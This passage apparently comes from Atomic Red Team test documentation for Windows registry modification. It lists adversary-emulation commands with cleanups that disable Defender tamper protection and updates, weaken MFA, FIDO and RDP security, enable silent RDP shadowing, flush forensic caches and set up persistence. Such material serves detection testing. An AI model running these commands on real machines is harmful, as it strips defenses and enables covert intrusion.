reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 0 /f
```
<br/>
<br/>
## Atomic Test #52 - Disable Windows OS Auto Update
Disable Auto Update Windows OS feature. Redline is using this as part of its defense evasion.
**Supported Platforms:** Windows
**auto_generated_guid:** 01b20ca8-c7a3-4d86-af59-059f15ed5474
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 0 /f
```
<br/>
<br/>
## Atomic Test #53 - Disable Windows Auto Reboot for current logon user
Disable Windows Auto Reboot for current logon user. Redline is using this as part of its defense evasion.
**Supported Platforms:** Windows
**auto_generated_guid:** 396f997b-c5f8-4a96-bb2c-3c8795cf459d
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 0 /f
```
<br/>
<br/>
## Atomic Test #54 - Windows Auto Update Option to Notify before download
Windows Auto Update Option to Notify before download. Redline is using this as part of its defense evasion.
**Supported Platforms:** Windows
**auto_generated_guid:** 335a6b15-b8d2-4a3f-a973-ad69aa2620d7
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t REG_DWORD /d 2 /f
```
#### Cleanup Commands:
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t REG_DWORD /d 3 /f
```
<br/>
<br/>
## Atomic Test #55 - Do Not Connect To Win Update
Do Not Connect To Win Update. Redline is using this as part of its defense evasion.
**Supported Platforms:** Windows
**auto_generated_guid:** d1de3767-99c2-4c6c-8c5a-4ba4586474c8
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 0 /f
```
<br/>
<br/>
## Atomic Test #56 - Tamper Win Defender Protection
Tamper Win Defender Protection. RedLine Stealer is executing another component file to modify this win defender feature in registry.
Take note that this modification might not be enough to disable this feature but can be a good indicator of malicious process that
tries to tamper this Win Defender feature settings.
**Supported Platforms:** Windows
**auto_generated_guid:** 3b625eaa-c10d-4635-af96-3eae7d2a2f3c
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0 /f
```
#### Cleanup Commands:
```cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 5 /f
```
<br/>
<br/>
## Atomic Test #57 - Snake Malware Registry Blob
The following Atomic Test creates a registry blob in HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds, which is related to Snake Malware. Per the report, upon execution, Snake's WerFault.exe will attempt to decrypt an encrypted blob within the Windows
registry that is typically found at HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds. The encrypted data includes the AES key, IV, and path that is used to find and decrypt the file containing Snake's kernel driver and kernel driver loader.
**Supported Platforms:** Windows
**auto_generated_guid:** 8318ad20-0488-4a64-98f4-72525a012f6b
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$typicalPath = "HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds"; $randomBytes = New-Object Byte[] 0x1000; (New-Object Random).NextBytes($randomBytes); New-ItemProperty -Path $typicalPath -Name "AtomicSnake" -Value $randomBytes -PropertyType Binary -Force | Out-Null
```
#### Cleanup Commands:
```powershell
$typicalPath = "HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds"; Remove-ItemProperty -Path $typicalPath -Name "AtomicSnake" -ErrorAction SilentlyContinue | Out-Null
```
<br/>
<br/>
## Atomic Test #58 - Allow Simultaneous Download Registry
A registry modification to allow Simultaneous download in the system.
**Supported Platforms:** Windows
**auto_generated_guid:** 37950714-e923-4f92-8c7c-51e4b6fffbf6
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /t REG_DWORD /d 10 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /t REG_DWORD /d 10 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /f
```
<br/>
<br/>
## Atomic Test #59 - Modify Internet Zone Protocol Defaults in Current User Registry - cmd
This test simulates an adversary modifying the Internet Zone Protocol Defaults in the registry of the currently logged-in user using the reg.exe utility via the command prompt. Such modifications can be indicative of an adversary trying to weaken browser security settings. Upon execution, if successful, the message "The operation completed successfully." will be displayed.
To verify the effects of the test:
1. Open the Registry Editor (regedit.exe).
2. Navigate to "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults".
3. Check for the presence of the "http" and "https" DWORD values set to `0`.
Or run:
```batch
reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults"
```
**Supported Platforms:** Windows
**auto_generated_guid:** c88ef166-50fa-40d5-a80c-e2b87d4180f7
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v http /t REG_DWORD /d 0 /F
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v https /t REG_DWORD /d 0 /F
```
#### Cleanup Commands:
```cmd
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v http /t REG_DWORD /d 3 /F
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v https /t REG_DWORD /d 3 /F
```
<br/>
<br/>
## Atomic Test #60 - Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell
This test simulates an adversary modifying the Internet Zone Protocol Defaults in the registry of the currently logged-in user using PowerShell. Such modifications can be indicative of an adversary attempting to weaken browser security settings.
To verify the effects of the test:
1. Open the Registry Editor (regedit.exe).
2. Navigate to "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults".
3. Check for the presence of the "http" and "https" DWORD values set to `0`.
Or run:
```powershell
Get-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults' | Select-Object http,https
```
**Supported Platforms:** Windows
**auto_generated_guid:** b1a4d687-ba52-4057-81ab-757c3dc0d3b5
#### Attack Commands: Run with `powershell`!
```powershell
# Set the registry values for http and https to 0
Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults' -Name 'http' -Value 0
Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults' -Name 'https' -Value 0
```
#### Cleanup Commands:
```powershell
# Restore the registry values for http and https to 3
Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults' -Name 'http' -Value 3
Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults' -Name 'https' -Value 3
```
<br/>
<br/>
## Atomic Test #61 - Activities To Disable Secondary Authentication Detected By Modified Registry Value.
Detect the disable secondary authentication activities that adversary attempt to bypass MFA and to get the unauthorized access to the system or sensitive data.
See the related article (https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.SecondaryAuthenticationFactor::MSSecondaryAuthFactor_AllowSecondaryAuthenticationDevice).
**Supported Platforms:** Windows
**auto_generated_guid:** c26fb85a-fa50-4fab-a64a-c51f5dc538d5
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\SecondaryAuthenticationFactor" /v "AllowSecondaryAuthenticationDevice" /t REG_DWORD /d 0 /f
```
#### Cleanup Commands:
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\SecondaryAuthenticationFactor" /v "AllowSecondaryAuthenticationDevice" /t REG_DWORD /d 1 /f
```
<br/>
<br/>
## Atomic Test #62 - Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.
Detect the Microsoft FIDO authentication disable activities that adversary attempt to gains access to login credentials (e.g., passwords), they may be able to impersonate the user and access sensitive accounts or data and also increases the risk of falling victim to phishing attacks.
See the related article (https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.FidoAuthentication::AllowFidoDeviceSignon).
**Supported Platforms:** Windows
**auto_generated_guid:** ffeddced-bb9f-49c6-97f0-3d07a509bf94
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v "AllowExternalDeviceSignon" /t REG_DWORD /d 0 /f
```
#### Cleanup Commands:
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v "AllowExternalDeviceSignon" /t REG_DWORD /d 1 /f
```
<br/>
<br/>
## Atomic Test #63 - Scarab Ransomware Defense Evasion Activities
Scarab Ransomware defense evasion activities that can abuse the registry values to modify the settings of the Credential Security Support Provider to overcome potential RDP connection issues.
[Scarab Ransomware Article](https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/)
**Supported Platforms:** Windows
**auto_generated_guid:** ca8ba39c-3c5a-459f-8e15-280aec65a910
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f
```
#### Cleanup Commands:
```cmd
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 0 /f
```
<br/>
<br/>
## Atomic Test #64 - Disable Remote Desktop Anti-Alias Setting Through Registry
A modification registry to disable RDP anti-alias settings. This technique was seen in DarkGate malware as part of its installation
**Supported Platforms:** Windows
**auto_generated_guid:** 61d35188-f113-4334-8245-8c6556d43909
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d 0 /f
```
<br/>
<br/>
## Atomic Test #65 - Disable Remote Desktop Security Settings Through Registry
A modification registry to disable RDP security settings. This technique was seen in DarkGate malware as part of its installation
**Supported Platforms:** Windows
**auto_generated_guid:** 4b81bcfa-fb0a-45e9-90c2-e3efe5160140
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 0 /f
```
<br/>
<br/>
## Atomic Test #66 - Disabling ShowUI Settings of Windows Error Reporting (WER)
A modification registry to disable ShowUI settings of Windows Error Report. This registry setting can influence the behavior of error reporting dialogs or prompt box.
This technique was seen in DarkGate malware as part of its installation.
**Supported Platforms:** Windows
**auto_generated_guid:** 09147b61-40f6-4b2a-b6fb-9e73a3437c96
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting" /v DontShowUI /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting" /v DontShowUI /t REG_DWORD /d 0 /f
```
<br/>
<br/>
## Atomic Test #67 - Enable Proxy Settings
A modification registry to enable proxy settings. This technique was seen in DarkGate malware as part of its installation.
**Supported Platforms:** Windows
**auto_generated_guid:** eb0ba433-63e5-4a8c-a9f0-27c4192e1336
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f
```
<br/>
<br/>
## Atomic Test #68 - Set-Up Proxy Server
A modification registry to setup proxy server. This technique was seen in DarkGate malware as part of its installation.
**Supported Platforms:** Windows
**auto_generated_guid:** d88a3d3b-d016-4939-a745-03638aafd21b
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /t REG_SZ /d "proxy.atomic-test.com:8080" /f
```
#### Cleanup Commands:
```cmd
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /f
```
<br/>
<br/>
## Atomic Test #69 - RDP Authentication Level Override
A modification registry to override RDP Authentication Level. This technique was seen in DarkGate malware as part of its installation.
**Supported Platforms:** Windows
**auto_generated_guid:** 7e7b62e9-5f83-477d-8935-48600f38a3c6
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add "HKCU\Software\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride /t REG_DWORD /d 0 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKCU\Software\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride
```
<br/>
<br/>
## Atomic Test #70 - Enable RDP via Registry (fDenyTSConnections)
Modify the registry value of fDenyTSConnections to allow incoming RDP connections.
This activity has been observed by multiple ransomware groups, including Hive ransomware.
[Reference](https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/)
**Supported Platforms:** Windows
**auto_generated_guid:** 16bdbe52-371c-4ccf-b708-79fba61f1db4
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remove_rdp_access_during_cleanup | Set to 1 if you want the cleanup to remove RDP access to machine | integer | 0|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
```
#### Cleanup Commands:
```cmd
if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
```
<br/>
<br/>
## Atomic Test #71 - Disable Windows Prefetch Through Registry
Modify the registry of the machine to disable prefetch. Disabling prefetch will remove one artifact for evidence of application execution. Restart is required post modification
**Supported Platforms:** Windows
**auto_generated_guid:** 7979dd41-2045-48b2-a54e-b1bc2415c9da
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d 0 /f
```
#### Cleanup Commands:
```cmd
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d 3 /f
```
<br/>
<br/>
## Atomic Test #72 - Setting Shadow key in Registry for RDP Shadowing
Microsoft Remote Desktop Protocol (RDP) supports a “shadowing” feature and RDP is available in all Windows Server Operating Systems and the business editions of end-user Windows versions.
In order to use the RDP shadowing feature, the Remote Desktop Services (TermService) service needs to be running (which it does by default), a rule needs to be enabled in the Windows Firewall and in case of stealth reasons, a setting needs to be configured to not prompt the user for permission when they are being shadowed.
In order to configure RDP shadowing session in a quiet mode. The registry of a remote system can be updated using several protocols, depending on the accessible ports and configuration of the services listening on those ports. Our aim is to set the Shadow value in HKLM\Software\Policies\Microsoft\Windows NT\Terminal Services on the remote machine to 2, which allows us to both view and control the session without the user being informed.
[Reference](https://blog.bitsadmin.com/spying-on-users-using-rdp-shadowing)
**Supported Platforms:** Windows
**auto_generated_guid:** ac494fe5-81a4-4897-af42-e774cf005ecb
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| server_name | The remote server that we need to shadow and have to do the registry modification. | string | localhost|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$s= New-CimSession -Computername #{server_name} -SessionOption (New-CimSessionOption -Protocol Dcom)
Get-CimInstance -Namespace ROOT\StandardCimv2 -ClassName MSFT_NetFirewallRule -Filter 'DisplayName="Remote Desktop - Shadow (TCP-In)"' -CimSession $s | Invoke-CimMethod -MethodName Enable
Invoke-CimMethod -ClassName StdRegProv -MethodName SetDWORDValue -Arguments @{hDefKey=[uint32]2147483650; sSubKeyName="Software\Policies\Microsoft\Windows NT\Terminal Services"; sValueName="shadow"; uValue=[uint32]2} -CimSession $s
```
#### Cleanup Commands:
```powershell
Invoke-CimMethod -ClassName StdRegProv -MethodName DeleteValue -Arguments @{hDefKey=[uint32]2147483650; sSubKeyName="Software\Policies\Microsoft\Windows NT\Terminal Services"; sValueName="Shadow"} -CimSession $s
```
<br/>
<br/>
## Atomic Test #73 - Flush Shimcache
The ShimCache is a component in Windows operating systems that stores information about recently executed applications. It is used by the operating system to speed up the launching process of applications. The ShimCache is also used by IR teams and Forensic teams. Forensic investigators can use the ShimCache to determine which programs have been executed on a system, even if they have been deleted or their logs have been cleared.Reference : https://blueteamops.medium.com/shimcache-flush-89daff28d15e
**Supported Platforms:** Windows
**auto_generated_guid:** ecbd533e-b45d-4239-aeff-b857c6f6d68b
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
Rundll32.exe apphelp.dll,ShimFlushCache
```
<br/>
<br/>
## Atomic Test #74 - Disable Windows Remote Desktop Protocol
Modify the registry of the machine to disable remote desktop protocol.
**Supported Platforms:** Windows
**auto_generated_guid:** 5f8e36de-37ca-455e-b054-a2584f043c06
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f
```
<br/>
<br/>
## Atomic Test #75 - Enforce Smart Card Authentication Through Registry
Enforce Smart Card Authentication Through Registry
**Supported Platforms:** Windows
**auto_generated_guid:** 4c4bf587-fe7f-448f-ba8d-1ecec9db88be
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v scforceoption /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v scforceoption /f
```
<br/>
<br/>
## Atomic Test #76 - Requires the BitLocker PIN for Pre-boot authentication
Requires the BitLocker PIN for Pre-boot authentication
**Supported Platforms:** Windows
**auto_generated_guid:** 26fc7375-a551-4336-90d7-3f2817564304
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseAdvancedStartup /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseAdvancedStartup /f
```
<br/>
<br/>
## Atomic Test #77 - Modify EnableBDEWithNoTPM Registry entry
Allow BitLocker without a compatible TPM (requires a password)
**Supported Platforms:** Windows
**auto_generated_guid:** bacb3e73-8161-43a9-8204-a69fe0e4b482
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v EnableBDEWithNoTPM /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete ""HKLM\SOFTWARE\Policies\Microsoft\FVE"" /v EnableBDEWithNoTPM /f
```
<br/>
<br/>
## Atomic Test #78 - Modify UseTPM Registry entry
Use Trusted Platform Module (TPM) for Bitlocker tool
**Supported Platforms:** Windows
**auto_generated_guid:** 7c8c7bd8-0a5c-4514-a6a3-0814c5a98cf0
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPM /t REG_DWORD /d 2 /f
```
#### Cleanup Commands:
```cmd
reg delete ""HKLM\SOFTWARE\Policies\Microsoft\FVE"" /v UseTPM /f
```
<br/>
<br/>
## Atomic Test #79 - Modify UseTPMPIN Registry entry
Allow startup PIN with TPM for Bitlocker tool
**Supported Platforms:** Windows
**auto_generated_guid:** 10b33fb0-c58b-44cd-8599-b6da5ad6384c
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMPIN /t REG_DWORD /d 2 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMPIN /f
```
<br/>
<br/>
## Atomic Test #80 - Modify UseTPMKey Registry entry
Allow startup key with TPM for Bitlocker tool
**Supported Platforms:** Windows
**auto_generated_guid:** c8480c83-a932-446e-a919-06a1fd1e512a
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMKey /t REG_DWORD /d 2 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMKey /f
```
<br/>
<br/>
## Atomic Test #81 - Modify UseTPMKeyPIN Registry entry
Allow startup key and PIN with TPM for Bitlocker tool
**Supported Platforms:** Windows
**auto_generated_guid:** 02d8b9f7-1a51-4011-8901-2d55cca667f9
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMKeyPIN /t REG_DWORD /d 2 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMKeyPIN /f
```
<br/>
<br/>
## Atomic Test #82 - Modify EnableNonTPM Registry entry
Allow Bitlocker without TPM for Bitlocker tool
**Supported Platforms:** Windows
**auto_generated_guid:** e672a340-a933-447c-954c-d68db38a09b1
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v EnableNonTPM /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v EnableNonTPM /f
```
<br/>
<br/>
## Atomic Test #83 - Modify UsePartialEncryptionKey Registry entry
Allow startup key with TPM for Bitlocker tool
**Supported Platforms:** Windows
**auto_generated_guid:** b5169fd5-85c8-4b2c-a9b6-64cc0b9febef
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UsePartialEncryptionKey /t REG_DWORD /d 2 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UsePartialEncryptionKey /f
```
<br/>
<br/>
## Atomic Test #84 - Modify UsePIN Registry entry
Allow startup PIN with TPM for Bitlocker tool
**Supported Platforms:** Windows
**auto_generated_guid:** 3ac0b30f-532f-43c6-8f01-fb657aaed7e4
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UsePIN /t REG_DWORD /d 2 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UsePIN /f
```
<br/>
<br/>
## Atomic Test #85 - Abusing Windows TelemetryController Registry Key for Persistence
The Windows Compatibility Telemetry system makes use of the CompatTelRunner.exe binary to run a variety of telemetry tasks. It relies on the registry for instructions on which commands to run.
It will run any arbitrary command without restriction of location or type. Blog :https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence
**Supported Platforms:** Windows
**auto_generated_guid:** 4469192c-2d2d-4a3a-9758-1f31d937a92b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| new_key | New Registry Key Added | string | NewKey|
| new_executable | Custom Executable to run | string | C:&#92;Windows&#92;System32&#92;notepad.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\#{new_key}" /t REG_SZ /v Command /d #{new_executable} /f
```
#### Cleanup Commands:
```cmd
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\#{new_key}" /f
```
<br/>
<br/>
## Atomic Test #86 - Modify RDP-Tcp Initial Program Registry Entry
If the fInheritInitialProgram value is set to 1, the exe indicated in the InitialProgram value is automatically started on RDP connection.
Once the test commands are run, notepad will execute automatically on new RDP connection
**Supported Platforms:** Windows
**auto_generated_guid:** c691cee2-8d17-4395-b22f-00644c7f1c2d
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v fInheritInitialProgram /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v InitialProgram /t REG_SZ /d "C:\Windows\System32\notepad.exe" /f
```
#### Cleanup Commands:
```cmd
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v InitialProgram /t REG_SZ /d "" /f
```
<br/>
<br/>
## Atomic Test #87 - Abusing MyComputer Disk Cleanup Path for Persistence
Replacing the registry settings with custom executable will end up with the replacement programs being executed at the time OS will decide to kick off the respective activity
**Supported Platforms:** Windows
**auto_generated_guid:** f2915249-4485-42e2-96b7-9bf34328d497
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\cleanuppath" /t REG_EXPAND_SZ /d "%systemroot%\system32\notepad.exe" /f
```
#### Cleanup Commands:
```cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\cleanuppath" /t REG_EXPAND_SZ /d "%SystemRoot%\System32\cleanmgr.exe /D %c" /f
```
<br/>
<br/>
## Atomic Test #88 - Abusing MyComputer Disk Fragmentation Path for Persistence
Replacing the registry settings with custom executable will end up with the replacement programs being executed at the time OS will decide to kick off the respective activity
**Supported Platforms:** Windows
**auto_generated_guid:** 3235aafe-b49d-451b-a1f1-d979fa65ddaf
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\DefragPath" /t REG_EXPAND_SZ /d "%systemroot%\system32\notepad.exe" /f
```
#### Cleanup Commands:
```cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\DefragPath" /t REG_EXPAND_SZ /d "%systemroot%\system32\dfrgui.exe" /f
```
<br/>
<br/>
## Atomic Test #89 - Abusing MyComputer Disk Backup Path for Persistence
Replacing the registry settings with custom executable will end up with the replacement programs being executed at the time OS will decide to kick off the respective activity
**Supported Platforms:** Windows
**auto_generated_guid:** 599f3b5c-0323-44ed-bb63-4551623bf675
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
